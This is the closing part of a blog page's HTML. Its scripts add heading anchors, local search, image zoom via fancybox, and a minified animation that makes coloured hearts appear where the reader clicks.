  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>







  
  
    <script>
      !function (e, t, a) {
        function r() {
          for (var e = 0; e < s.length; e++) s[e].alpha <= 0 ? (t.body.removeChild(s[e].el), s.splice(e, 1)) : (s[e].y--, s[e].scale += .004, s[e].alpha -= .013, s[e].el.style.cssText = "left:" + s[e].x + "px;top:" + s[e].y + "px;opacity:" + s[e].alpha + ";transform:scale(" + s[e].scale + "," + s[e].scale + ") rotate(45deg);background:" + s[e].color + ";z-index:99999");
          requestAnimationFrame(r)
        }

        function n() {
          var t = "function" == typeof e.onclick && e.onclick;
          e.onclick = function (e) {
            t && t(), o(e)
          }
        }

        function o(e) {
          var a = t.createElement("div");
          a.className = "heart", s.push({
            el: a,
            x: e.clientX - 5,
            y: e.clientY - 5,
            scale: 1,
            alpha: 1,
            color: c()
          }), t.body.appendChild(a)
        }

        function i(e) {
          var a = t.createElement("style");
          a.type = "text/css";
          try {
            a.appendChild(t.createTextNode(e))
          } catch (t) {
            a.styleSheet.cssText = e
          }
          t.getElementsByTagName("head")[0].appendChild(a)
        }

        function c() {
          return "rgb(" + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + ")"
        }

        var s = [];
        e.requestAnimationFrame = e.requestAnimationFrame || e.webkitRequestAnimationFrame || e.mozRequestAnimationFrame || e.oRequestAnimationFrame || e.msRequestAnimationFrame || function (e) {
          setTimeout(e, 1e3 / 60)
        }, i(".heart{width: 10px;height: 10px;position: fixed;background: #f00;transform: rotate(45deg);-webkit-transform: rotate(45deg);-moz-transform: rotate(45deg);}.heart:after,.heart:before{content: '';width: inherit;height: inherit;background: inherit;border-radius: 50%;-webkit-border-radius: 50%;-moz-border-radius: 50%;position: fixed;}.heart:after{top: -5px;}.heart:before{left: -5px;}"), n(), r()
      }(window, document);
    </script>
  














</body>
</html>
